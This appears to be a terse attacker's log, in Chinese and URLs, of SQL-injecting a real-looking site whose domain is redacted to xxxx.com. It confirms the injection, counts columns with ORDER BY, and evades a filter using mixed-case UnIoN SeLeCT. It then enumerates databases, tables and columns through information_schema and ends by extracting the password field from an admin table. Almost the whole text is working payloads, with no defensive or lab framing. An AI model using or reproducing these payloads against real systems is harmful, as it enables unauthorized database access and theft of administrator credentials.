http://xxx.com/news_blank.php?id=296 and 1=1
http://xxxxx.com/news_blank.php?id=296+and+1=1
http://xxxx.com/news_blank.php?id=296+and+1=2
确认是注入
http://xxxx.com/news_blank.php?id=296 order by 11 正确 http://xxxx.com/news_blank.php?id=296 order by 12 错误
http://xxxx.com/news_blank.php?id=296 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 拦截
http://xxxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,4,5,6,7,8,9,10,11--+
成功绕过
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,user(),5,6,7,version(),9,10,11--+
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(schema_name as char))),5,6,7,version(),9,10,11 from information_schema.schemata limit 1,2
获取数据库名
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(table_name as char))),5,6,7,version(),9,10,11 from information_schema.tables where table_schema='hengdong' limit 0,1
查询表名
由于表名太多 所以用python写了个脚本
http://xxxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(column_name as char))),5,6,7,version(),9,10,11 from information_schema.columns where table_schema='hengdong' and table_name='hdwl_admin' limit 3,4
查询字段名
http://xxx.com/news_blank.php?id=296+and+1=2+UnIoN+SeLeCT+1,2,3,unhex(Hex(cast(pwd as char))),5,6,7,version(),9,10,11 from hdwl_admin
查询字段的内容
